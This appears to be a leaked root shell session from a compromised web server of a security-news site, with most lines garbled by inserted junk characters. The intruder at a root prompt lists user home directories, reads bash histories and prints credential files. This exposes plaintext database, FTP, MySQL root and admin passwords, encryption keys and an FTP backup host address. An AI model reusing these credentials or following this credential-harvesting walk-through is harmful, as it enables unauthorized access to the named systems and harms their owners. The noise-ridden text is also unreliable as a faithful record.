9 w6 }: U4 j5 \: J1 ^* P#####################################################0 Q* {) s: P7 o* o
# #
& `0 L2 b/ p% E4 X# Admin Contact - 链接标记support@secureservertech.com #/ e6 N; E0 v) ~, E `! _8 v5 N7 c
# #5 w2 G( x2 `( c5 R) g( f- M' q. M4 l9 [
# Available ShortCuts #7 A! I, R2 {; a" @$ n2 @0 h9 O7 I
# #
6 u, B+ z* e! I& D% K: D# K2 g6 s# nst - list active connections #
. d' ~) {2 r1 A9 h; q# z# ddos - shows how many times each ip is connected #
# A6 V( [4 t8 |0 X. I: O0 @, J# ltr - restart the webserver #
* `. p' B n" o$ U8 a# phpc - edit the php config file #+ _# d0 X2 ~' U+ P5 Z9 k% w
# htc - edit the webserver configuration file #
& H/ f/ }2 J" A4 z) a" X# up - uptime #& D: T" i; B7 C' g( K, G
# etd - edit the motd of the day file #
, F& z2 r+ b. M0 s5 D$ n# htr - start and restart apache if needed #9 o5 I( v+ z* F! j; b8 o1 w& g4 }
# syng - shows active SYN_RECV connections #- I4 c. s5 Y/ i6 g2 f3 ~
# synd - syn flood blocker - “synd -h” for usage #" d+ h, L; M0 {& e4 k" c( X
#####################################################" ?! x* K2 K4 t1 W9 q
# NOTES: #/ [' l( h! Q* A. F
# Last Upgrade - 12-08-2008 by JF #
3 V1 N, O( z# w$ F' B) [# My.cnf/Mysql Optimization - 1-28-09 #& j* H/ K+ c5 u ~
# #
+ p3 L9 ~- ?+ I a; L& `# #
' F* ^! V+ Y4 E. x4 E5 w# # ?* W F+ l9 f! {9 ], x
#####################################################
8 E- w n1 I7 ^0 @- y7 y; T0 P) k" g6 X' y# z3 I+ P
sh-3.2# lastlog | grep -v Never$ F X0 ^$ |8 q5 V! d" R) Q1 n! |
Username Port From Latest
: ~" F' {" w; P& J* R b+ proot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
: b( H& w$ H2 J: ~0 W( Hadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
; N6 l2 i5 \' r! y% Y0 kcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20099 K- `. k2 ` ?6 r* m% V
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
' T% Q1 K/ U' k' |( M4 R% A0 M# ^) C9 x& _; A' U/ V6 o. _
sh-3.2# ls -la! _- W9 q9 U- F, G# h
total 453376
/ d( `7 S% K3 |: @0 U* `! n: O" Hdrwxr-x— 15 root root 4096 Jun 4 08:40 .
$ g2 f" f3 B& N& G5 @( I/ ~! ^drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
4 r& }# n4 u' F( \8 E1 |, n-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
8 S( H: W" f4 x, w& Q3 ?! @ S9 X-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg$ t) U# L/ k0 c$ ?, {. ^, f& D7 Y- o
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
9 Z4 m) M7 d1 R- l8 F' K# f-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout3 i/ a* }' W5 f" b
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile8 Z- H0 K& l! s6 C% q( d2 S9 c
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc3 r3 L4 v5 d' w
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh% F0 |6 P5 a3 z+ x! u
-rw-r–r– 1 root root 1327 Nov 29 2007 cert! A' m/ d6 Q/ R0 x1 k
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
- M5 w. c+ ~/ f) Udrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
% A! ?. N; G( l$ a/ [2 m) Z' k+ a* D-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
. G) l6 u9 t" [* u-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
3 _8 h m) c& f, F4 D& {/ Rdrwx—— 2 root root 4096 Oct 28 2007 .elinks2 h; M: B) s, h. d
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1* n# b6 C7 o% \2 a5 R
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
4 E/ d: K3 s4 l7 b9 {% {-rw——- 1 root root 0 Apr 16 13:19 .history
1 o* P" ?4 J# Z/ W$ u+ c- E) d-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
8 r) a- b8 P P-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog5 i! ]$ [9 q8 k3 S0 _
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh3 f; l7 D# t$ q! |0 V
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
/ G) P3 E- o: B, |' i h* _drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
1 W+ {1 Z! ^* D; [drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec# a$ ~5 B% w$ O5 `# n6 A. X
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
2 o" J. D. q) u$ e6 P-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2! Q4 K( K2 f3 C6 w' ~
-rwx—— 1 root root 760 Sep 18 2008 lp
* c) J P' d& V) y3 s9 C. H- B/ |* Gdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
# e9 t/ P$ W4 N7 U% Y% v# K6 h( C-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
* V& X" j/ U& a6 R/ v$ e! p& ?-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
" a( M, D2 n' \- Odrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9( o& _7 k* Q3 |$ w# X
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
+ O* i- O' X1 N1 ~; ?) V8 jdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
: F) u2 t) z+ j1 [9 A4 F-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz( q0 q. u( {8 e) s3 E0 G7 d
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh. e. W7 s& ~3 P& A# x
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
" s6 d; d" h' H b$ o-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
' t$ |0 F6 B- U3 t-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport( Y% t& m1 ~' y9 x- v5 R; c& n
-rw——- 1 root root 41 May 20 2008 .mytop
1 l1 b. m$ K1 M& bdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
7 f- S% ~8 q$ L& B. I, N+ r-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
6 p5 p7 I6 l+ k, t edrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp/ `6 ]; b& J. E2 P8 x5 d5 M4 |
-rw——- 1 root root 1462 Sep 21 2007 opt.php
. t% m# S3 U. B-rw-r–r– 1 root root 3371 Sep 22 2007 p% D/ N) _0 t- J% B: p7 S
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
h; H9 R$ G* S4 g1 l-rw——- 1 root root 1024 Feb 3 21:32 .rnd
% w L, f" ]8 O: ^$ z; f; a# f-rw-r–r– 1 root root 716 Nov 28 2007 server.csr" B; J0 Z! k5 }1 G
-rw-r–r– 1 root root 887 Nov 28 2007 server.key1 G; O! O8 {4 m( t
drwx—— 2 root root 4096 Oct 10 2008 .ssh
7 F3 S, K) c$ V" T1 A-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
4 Y: v& n9 |3 [" m-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc7 a% `+ w% u4 j
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip* B+ m# e5 H, ?) I
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1/ O8 G B4 z3 M3 W8 f
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp9 E# n; H) ]5 F
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh( A! u5 h+ n& w* b$ U4 g b& G
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
/ U6 B: b$ a$ w: k/ l' o. y' S8 `6 X-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
; J* U; r4 C- z/ G-rw——- 1 root root 12997 May 16 2008 .viminfo
; ?( q0 e6 P! _( f% I( h8 g) l9 v) p: i' m. K
sh-3.2# cat .bash_history) g B/ q! ~3 E Z( S; ?) I
[snip]
% \5 ?& t# v* X& Q! Iwget cp4sst.com/sstlinux.tar.gz) x, l! a5 K0 \- n
tar zxvf sstlinux.tar.gz
& v. W# ` h# I7 X! S& r& m3 ccd linux-2.6.27.10' P( _8 D! |* K! n& a" B+ x
sh install.sh
* |! _: d) U/ G- H$ y. w k3 r0 }3 ?% Wmake bzImage ; make modules ; make modules_install ; make install
/ I8 m2 q$ X; d6 u+ P# k+ l8 i* xmake clean
+ n* j; s( A. C9 ]/ N* U& `. Zservice mysqld restart
: K2 ^2 G) z( S" |4 c[snip]' h" G8 i" }/ o! `/ q6 O' N
cd /usr/sbin/
, T. I9 G: K/ N* t" N% Y, {chmod 4777 traceroute
% }! |: ^4 N. q9 d* }0 }5 ochmod 4777 ping
2 a. T/ O2 ]. K& a$ Z! X) Y Htraceroute -I 链接标记[url]www.astalavista.ch[/url]
/ I. U! ^* y8 f, z[snip]
! B# x1 W7 U. E( Ivi /etc/csf/csf.conf
& D' i2 w' W: dtraceroute google.ch* L5 @4 X9 q- E: ~0 c! h2 z( M
service csf restart
: S- p$ D* v% h7 h" y& Z/ gtracert google.ch' k% q( C9 G2 N3 n T8 ~
service csf restart' J9 }% I- l% N/ S# a, h
traceroute 链接标记[url]www.google.ch[/url]* A. R; y! i* h4 i7 d9 I
tracert 链接标记[url]www.google.ch[/url]
5 j+ W: s, x( J* Itraceroute 链接标记[url]www.google.ch[/url]* Y \; E% p M- I1 s) S
locate traceroute; l8 ?0 Y- ~* V
chown 4755 /bin/traceroute& v% W' O: q! e; w) l
chown 4777 /bin/traceroute) K! o/ D4 s1 g( v8 J2 [( \! l8 A! X
locate ping' E& ]: Q% t9 L
chown 4755 /bin/ping. h3 }+ k9 L: s/ I! D) l* S
chown 4777 /bin/ping
0 C \. G. M8 b; }6 s) c% Pcd /bin/9 f! q. j- y, P9 |
ls -ali | grep ping1 B% {$ h. a# c3 j% w
chown root ping
" J, c% Q3 v r. T9 s3 Nchmod 4755 ping3 ~, d' c+ L! i2 u7 g# O# R% _, U
ls -ali | grep traceroute
5 s2 y+ I$ H/ S3 N$ o# {* Ychown root traceroute
$ V9 L( A2 E* i8 m% pchmod 4755 traceroute
i5 i6 q7 U V; p9 Sls -ali | grep traceroute' ?, j( |& d$ O: u) p# R- |
traceroute -I 链接标记[url]www.google.ch[/url]' b' o8 p1 ?; e0 X& A
traceroute 链接标记[url]www.google.ch[/url]6 ?, ?) Z- q3 d% q |$ a- I: u
whois pmsantos.ch$ U. M+ p0 k/ B+ Y# F7 m
[snip]
/ L# r \* i8 I, S6 |% Hmysql -h com_contrexx2_live < /root/defaultp_ports.sql
) V6 O" j' d" u2 Rmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql: J0 t, @; S% y2 \" w' T P
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql2 ?, M3 r2 b9 X3 |8 W3 Q
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
8 W H3 o$ F0 I* K7 F& Otop3 f& z+ q3 c. D7 X( F: q8 o
ping ssth.ch. R2 m% n8 E% J# ~# C
ping asdlkfaljgasd???ljg???lasj.ch
* M& P9 X7 |* ~( Y. wping asdlkfaljgasdlasj.ch- }% T$ ^, [) H% E3 K/ P! x) e8 t
ping 链接标记[url]www.ssth.ch[/url]
# F8 c4 g0 F' s; t3 ~( v9 Jping ssth.ch
4 v5 s- Z1 X; H. Mnslookup 链接标记[url]www.google.ch[/url]
) A; E" ^. u, \4 q# b. y% G+ |nslookup 链接标记[url]www.ssth.ch[/url]( e- H* n1 O0 S. w
man nslookup' }1 Z: Y6 G, J* K4 n/ d; u
ping 链接标记[url]www.google.ch[/url]
3 [- i' w- A5 t* T9 d% V! }nslookup 链接标记[url]www.google.ch[/url]
5 A9 [: `. s* ]nslookup 链接标记[url]www.google.ch[/url]: m- K. `" C! Z8 e$ x
nslookup salfjasdlf.ch! P) \3 X7 h; z' [. [7 i' E' P
[snip]
; N- ~8 _. P& }# S3 N- G: G( j* yopenssl passwd -1 sadf+ e( R$ _" ^1 A
openssl passwd -1 5cZNHstdTy8 c) q1 n5 U- }, q) n2 {' \
mysql' k; I. b) q" T+ x/ I, e0 t b
mysql
7 _0 I8 N1 g1 @ L" }locate proftp
8 O+ V- H- C9 Z0 I0 p# G& F( Hvi /etc/proftpd.passwd
& M, V; W# e3 T/ lservice proftpd restart/ v0 p' z* } b) _9 E
locate proftpd.conf+ ^' |9 [* p8 W7 i: m' h# D
vi /etc/proftpd.conf
& L6 l7 y# @$ {' L$ l/ ]- n2 |$ svi /etc/proftpd.passwd1 w1 B; u6 q( @1 T* N7 U3 O; e- r
service proftpd restart
; x1 @1 A3 V1 O M' t, _[snip]
, w. l) H; i7 z( a3 b/bin/sh /home/com/backup_system/backup.sh
9 ~4 v+ N9 T7 P6 m+ X' w% B6 Jtar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
; K% z; o3 H7 V1 m7 w8 {5 Wmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
& E; G! n" x9 S' J! ^+ O# Amysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql. }# x4 {' M1 E& k- A$ ^5 r1 \
ls -ali
9 `! w( _; a O2 `7 imysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql l4 j& |; ], n/ d# ?1 V. z8 f
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
& \0 R1 b8 I8 S/ {- Zcrontab -l
3 ~ d" W$ n' @$ t9 y# F, rcrontab -l
: K0 o7 Y* W3 Z; S$ vphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
, W8 `+ { n" `2 Q( Z: A/ c7 D O/home/com/public_html/modifications/cronjobs/exploits.sh- c h4 b, f; t+ w
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
( {+ W3 V( O6 w" Ztar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz" X7 q+ _5 V; {+ W6 V9 L& k
cd lsws-4.0.3$ f6 C) ?4 u: z
sh install.sh/ Y! K; d% [2 U0 w
uptime2 c" n: D7 g* I9 w; C
hdparm -tt /dev/sda n; P! }: T' }7 s- }1 ^+ G
iostat
4 C* e& r5 O* T/ G6 p# `2 k1 pyum install iostat
8 H% a8 t) V6 yiostat% G5 V/ A6 P- L' h8 B3 y! A4 r
whereis iostat8 F% V$ e o2 [5 K
yjm clean all2 L. E6 i6 {1 u) t5 i' ?& E
yum clean all ; yum -y update
2 M/ T& }$ j- l" l% }, A; H) w( Hiostat% F" q5 T) B' j" P' A% ?
yum install systat! y; \2 z/ ~6 f+ \0 b
rpm -qa | grep iostat! @; n2 L( l) c J3 s3 Y! T) F* Z
rpm -qa | grep sysstat( O/ ^% X q% N1 _ k
rpm -qa | grep systat
9 ~2 v" a3 i( V+ Y- ]/ hdmesg -c
Y- w. P8 N* b; O* usysctl -p8 `& M8 j" ] r0 T2 z
uname -r
9 p" V. J/ O7 rcd /usr/src: x' B! m( a% Z+ z8 m. a/ M1 ^
wget nix101.com/kernels/sstlinux.tar.gz2 S& s+ y. Z% |% |
shutdown -r now2 X0 P! d3 M% ]8 C0 x
nano -w /boot/grub/grub.conf
, T" E# {2 S- L" K/ Q# _2 z6 C- Q8 G
0 v b, Y% Z$ u( [4 G: lsh-3.2# cat .my.cnf2 H# Y" ~, K6 `+ e% \) g" D ^
[client]
( ]* p0 Y/ k# z3 M# nuser=da_admin, {4 f, x l' e
password=X9dctmRH
9 s# B: l( Q, s5 U
& G1 o( D# K' m; lsh-3.2# cat /home/com/backup_system/backup.sh: m( s+ r$ ^) R5 p& f
#!/bin/sh
9 Y5 O* r2 g" ?; ^9 I) A9 m1 H#####################################################################) ]( g: }) ~' e" Q5 J
# #5 `- E/ ~3 y4 m6 @1 ^
# incremental backup for astalavista.com #) f* G& Q) \$ C8 {& X" w( k# I) Q
# #
+ G5 l: ^3 c2 |! x: D' x# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
# E, N/ L* a0 _1 f# #/ g6 ?3 P/ T* r& ?- }% F
#####################################################################
/ M/ X& q' t% @[snip]! K7 X# a2 J1 E4 x( f
PROG_DIR=”/home/com/backup_system”;
: a/ K; M: Q3 n0 g& t3 g5 ~BACKUP_DIR=”/home/com/backups”; Y: T6 q: W' d# V w/ N
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;: l0 E$ }4 O4 J0 S8 t# x, w7 l
# ftp for synology backup server
2 _/ E2 K9 T- O1 R& sFTP_HOST=”212.254.194.163″;
$ v8 h+ J" }! g9 X- }0 ~FTP_PORT=”21″;
/ o8 y( G. i y4 {5 X) d; cFTP_USER=”astalavista.com”;
/ O( k @" x! N6 _FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
4 F% Y% k) T8 X8 e* Z3 yFTP_DIR=”/astalavista.com”;
) H! p5 E g7 v# j# database
# \: p2 y$ t5 Z" T+ i; |DB_HOST=”localhost”;& y+ f- l* l- T, m5 [) i8 K; K
DB_USER=”contrexxuser2″;
* m) G: r, _0 `9 jDB_PASS=”0fEYNZgXz1pKe”;1 L( U, U& [6 w {$ @9 `7 S; d- C# A
DB_DATABASE1=”com_contrexx2_live”;
- x4 {5 I0 w3 j# d$ [DB_DATABASE2=”com_contrexx2″;
; {- ]" \8 \0 P9 J5 T[snip]
3 L. f' n; \8 V( t& W# [9 J$ f- {ftp -in $FTP_HOST $FTP_PORT <<EOF
4 F9 `- S, v( @& }: _! e1 Tquote USER $FTP_USER6 F" W: l) {7 \
quote PASS $FTP_PASS( ?) I& R7 d/ H+ a7 q
cd $FTP_DIR
$ S- g# H" T- m+ c* s. e1 pput $DB_FULLNAME-SQL_Dump.tar
9 g& e& \6 B0 j# s, Z* w. gput $BACKUP_FULLNAME-Public_HTML.tar! p* ]: U% w7 M# F) k
close0 m* [; {- d+ |0 s- B) i' {
bye
9 K6 g4 N' S, H5 ]2 d' n% {EOF
7 I/ E- ~6 K9 I( |# E
: n9 ]8 W' c" A8 f1 M# osh-3.2# cd /home
; u! t: n) e% y4 jsh-3.2# ls -la. K: y5 g) a- z: a
total 120
8 ~& S& j8 \% f+ P4 edrwxr-xr-x 14 root root 4096 Mar 11 17:56 .- Q. Q1 m1 R4 G7 t# S* M
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
8 p+ r% @. d5 Tdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin: \$ b+ a( c/ B% |/ i! G
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group. H7 B/ W: E# C3 t! G) [
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
W, W7 y. @$ l) u& y8 Bdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
- W8 B1 x6 q8 i# m0 ~) J8 l' x6 |$ Ndrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
6 l: e+ ] h }. D6 }drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
. x9 I: X! `: J! F( v: |& F, Qdrwx–x–x 10 com com 4096 Apr 28 12:40 com P# {+ Y5 M3 Q' f5 ?
drwxr-xr-x 2 root root 4096 May 17 2007 ftp% s1 j' L, T6 N
drwx—— 3 jon jon 4096 Sep 21 2007 jon D: n& x$ A" K' ~4 l& u
drwx—— 2 root root 16384 Sep 11 2007 lost+found
. r! \( x+ j! C3 h$ q- Z) Q* Rdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
4 c$ Z% C8 z' \1 jdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
( }5 a5 ?4 j4 ]& B) @1 z* cdrwx—— 2 jon jon 4096 Sep 15 2007 test6 y7 T! W8 q R
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp( q+ D. H( [9 d( C2 d+ {. z
; z; J: W" g" bsh-3.2# cd admin! `' k; g% s7 O. I2 I: p! e J4 _5 i$ a( m
sh-3.2# ls -la+ g1 f; T- w8 A; E+ n
total 17358965 s2 f5 s1 N9 H2 o; V- Z6 E
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
5 {1 E l2 u7 i0 f& h! Ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
+ W/ s" T8 @1 a/ |7 J5 _drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
8 n5 {; g" L3 K. sdrwx—— 2 admin admin 4096 Sep 28 2007 backups$ P+ F- ^9 s2 B3 r% d% T+ `; f
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history; l7 G+ @3 W' A6 y) B. @. Z8 U
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
5 b9 E# x/ g4 H/ n# w' Z-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
3 y2 \" D2 P$ ~5 V-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
4 t8 u& ?) k# X! ydrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups+ L) Y2 g6 \; f
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
: l- a7 M- l) l7 U7 K F& n9 }7 hdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
+ R f t, _; _/ C* o9 a-rw-r–r– 1 root root 24 Sep 21 2007 info.php
4 L0 @' b" D& Hdrwx—— 2 admin admin 4096 Sep 21 2007 mail
, O9 ~! O4 @/ r& i$ Q3 P" f-rw-r–r– 1 root root 716 Nov 28 2007 server.csr& x h3 D4 |# r2 r& u( V2 v
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
2 s- }& N6 g/ ?7 k, }9 h-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
4 ~3 c) h9 y# {$ e) s* ]" b-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
0 H0 U5 \, D+ sdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups- o0 _% \& \* O4 ~
+ f' V4 n5 l5 f( V7 e1 P! Lsh-3.2# ..2 E. r. W! N8 p8 D0 N; O, }1 O. T
sh-3.2# cd jon
" x/ J/ D3 x) R( s. K/ n) qsh-3.2# ls -la
3 B! k# T2 j0 g6 J- Z; q! F7 btotal 36- h5 z2 P2 l- D9 V
drwx—— 3 jon jon 4096 Sep 21 2007 .
# d' E, D/ n; e7 `8 W2 Udrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
+ P8 M* s3 u2 p$ c2 `-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
u" J; {: F( \3 K, Z# D-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout+ A8 J5 ~: h# q# L6 b
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
8 l$ W$ U7 X6 D5 n; ]-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
9 X) g% w9 U: L2 W% n( ~; K-rw-r–r– 1 root root 24 Sep 21 2007 info.php; l/ u \, `, ]# W
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html3 Q7 J% S- c5 f# X+ X
H. k. ~. F) w/ y9 o- {7 e Ysh-3.2# cd ..) B- A- C j* w$ c
sh-3.2# cd test5 N5 s5 F6 A( b1 j$ [
sh-3.2# ls -la
) y9 p! j0 Y# H# Ctotal 484 I$ M+ P4 E+ D/ Q
drwx—— 2 jon jon 4096 Sep 15 2007 .
J% e# c8 M( c; `9 S$ ?4 V7 K7 q$ hdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- S" |. `. |; W/ ?3 z& S-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
" Q' \% a; z I0 B* R- n; W-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
6 h+ y) g& x, |7 _" D' E. [8 I' ]-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile5 n& B+ {; y$ v4 q
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc0 d' H4 w# |& O& A6 | ^' p4 ]
sh-3.2# cat .bash_history
* U- ]& q0 [8 S$ q+ _/usr/bin/mysqladmin -u root password PoliuJhytg67: M$ L0 G8 a$ q. _. |, `
0 A; `% I% ~8 M" R+ H+ V
sh-3.2# cd ..
5 \1 B- |7 |- O h1 W' R" Lsh-3.2# cd astanet
& C- E7 P% m/ ]; D8 r; Gsh-3.2# ls -la
3 J* T" j4 W9 f7 mtotal 52; r8 {& u" m! d" t
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
9 Y) t0 l$ b0 edrwxr-xr-x 14 root root 4096 Mar 11 17:56 .. `: ^& b, s% W' b9 q) K0 X! s
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth2 N9 e- g4 B3 p) s
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
# V/ A7 s" P4 z3 J# m-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout3 \8 r3 \8 m1 B6 e P9 `8 T
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile6 b0 C2 _+ X& a1 v& |" x3 N! U
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
) z/ h# i' p( o b# jdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
[8 Y) s, [2 t* a! }3 ^drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap3 Q8 V& [# g9 v$ ~" u. I+ V
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
4 P$ J# w& U+ E7 O-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history1 K S y- ^# Y
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html: V* L" `) t. N2 t# s `
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow' f2 ^$ n8 M' P k. x
! y3 p( J S3 A+ S% |) P! `) E8 Hsh-3.2# cd auth/) `3 b7 `0 t' I! J9 f( ~8 f+ {$ V
sh-3.2# ls -la
_& i8 r2 u* a/ |, [total 28
9 l" W+ d+ o9 }, I5 @/ Jdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
/ f3 S0 Z; ^: o1 ~drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
; Z; e$ G1 o8 R-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
V& T: s) X) x; `$ s; M-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php d% L; S8 ?1 t8 `& q1 q
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd; P2 J8 w, `5 Q6 H. D. |7 q
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
; a4 t' k/ g6 Q-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd/ H! @$ [' \/ }3 K d( w) j" U
0 A; g9 T7 n8 f }$ u& q; ~
sh-3.2# cat hackercontest.config.inc.php
T. D7 \- P: m/ h: T<?PHP% M. H$ o4 {# f- l' h! m/ K |3 l
// Variabeln f?r Verbindung zur Datenbank //
8 O% p- u9 p( j" B7 J- E o! ?5 T9 F0 f$conxHost = ‘localhost’; // MySQL hostname- Z# J. ?- r o" @- i, ~% @( h
$conxUser = ‘hackercontest’; // MySQL user% c* _% |4 ]% d) b9 ]* i4 c
$conxPassword = ‘K6m@7dUc’; // MySQL password
* v: e* ?- S* a# E; |0 }2 [$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish3 |1 u" F7 x( ?4 f% y7 L) V3 u
?>
+ |* ~* r. ~! n* l V& O+ Gsh-3.2# cat hosting.config.inc.php; G' g" j; @- ?
<?PHP
+ d& [1 _% r t' _* e// Variabeln f?r Verbindung zur Datenbank //
9 s4 w+ d+ `. t2 k$conxHost = ‘localhost’; // MySQL hostname
6 A6 u. F8 B! N$conxUser = ‘hostinguser’; // MySQL user
2 U& l9 ?9 T. C9 Q7 {/ X5 p) j$conxPassword = ‘cXvB3981′; // MySQL password! b. x# [! X1 L+ {% S
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish. [4 n J/ Y7 n5 W
?>4 y+ n7 g" @3 j, f
- O; q) v& T8 A% s. d; Z. xsh-3.2# cd ..# W/ J- m8 W: P8 ~( \
sh-3.2# cd com
! a5 b2 ?; }0 w9 S T Osh-3.2# ls -la' S( d! h! B( c5 |& c, u* Q
total 141208& U& A0 A+ i5 k+ J% w& y5 n. ?
drwx–x–x 10 com com 4096 Apr 28 12:40 .
$ J* J1 M0 K( E5 c# Vdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
$ `0 ? J, ]9 m ]+ ?drwx—— 2 com com 4096 Jun 4 04:04 backups% ^2 I/ Y4 Z3 h7 o
